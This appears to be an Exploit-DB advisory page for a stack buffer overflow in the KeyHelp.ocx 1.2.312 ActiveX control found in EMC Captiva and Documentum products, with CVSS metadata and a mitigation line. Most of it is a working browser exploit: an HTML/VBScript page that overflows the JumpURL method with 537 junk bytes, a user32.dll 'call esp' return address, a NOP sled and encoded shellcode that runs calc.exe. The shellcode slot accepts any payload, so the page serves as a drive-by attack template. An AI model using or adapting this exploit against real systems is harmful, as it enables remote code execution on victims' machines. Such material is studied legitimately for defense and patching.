EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote buffer overflow exploit (ie8 xp sp3)

vendor:

KeyWorks KeyHelp Module

by:

Nine:Situations:Group::pyrokinesis

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: KeyWorks KeyHelp Module

Affected Version From: 1.2.0312

Affected Version To: 1.2.0312

Patch Exists: Yes

Related CWE: N/A

CPE: a:emc:keyworks_keyhelp_module:1.2.312

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2009

EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote buffer overflow exploit (ie8 xp sp3)

The JumpMaddID() and JumpURL() methods of the KeyHelp.ocx 1.2.312 module of EMC multiple products suffer from a stack-based buffer overflow vulnerability. The EIP is overwritten after 537 bytes through the second argument, allowing attackers to execute arbitrary code. The exploit code provided in the text is a VBScript that executes calc.exe.

Mitigation:

Update to the latest version of the KeyHelp.ocx module.

Source

Exploit-DB raw data:

<!--
EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote
buffer overflow exploit
(ie8 xp sp3)
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

tested products:
EMC Captiva QuickScan Pro 4.6 sp1
EMC Documentum ApllicationXtender Desktop 5.4
and possibly other products carrying quickscan


CLSID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
Progid: KeyHelp.KeyCtrl.1
Binary Path: C:\WINDOWS\system32\KeyHelp.ocx
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True

JumpMaddedID() and JumpURL() methods suffer of the same stack based buffer overflow
eip is overwritten after 537 bytes through the second argument, you can touch SEH even
-->
<html>
<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' />
</object>
<script language='vbscript'>
//executing calc
scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
             unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
             unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
             unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
             unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
             unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
             unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
             unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
             unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
             unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
             unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
             unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
             unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
             unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
             unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
             unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
             unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
             unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
             unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
             unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
             unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
             unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
jnk = string(537,"A")
eip = unescape("%67%41%41%7e") '0x7E414167      call esp user32.dll
nop = string(16,unescape("%90"))
mapID=1
pstrChmFile= jnk + eip + nop + scode
pstrFrame="aaaaaaaa"
'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
</script>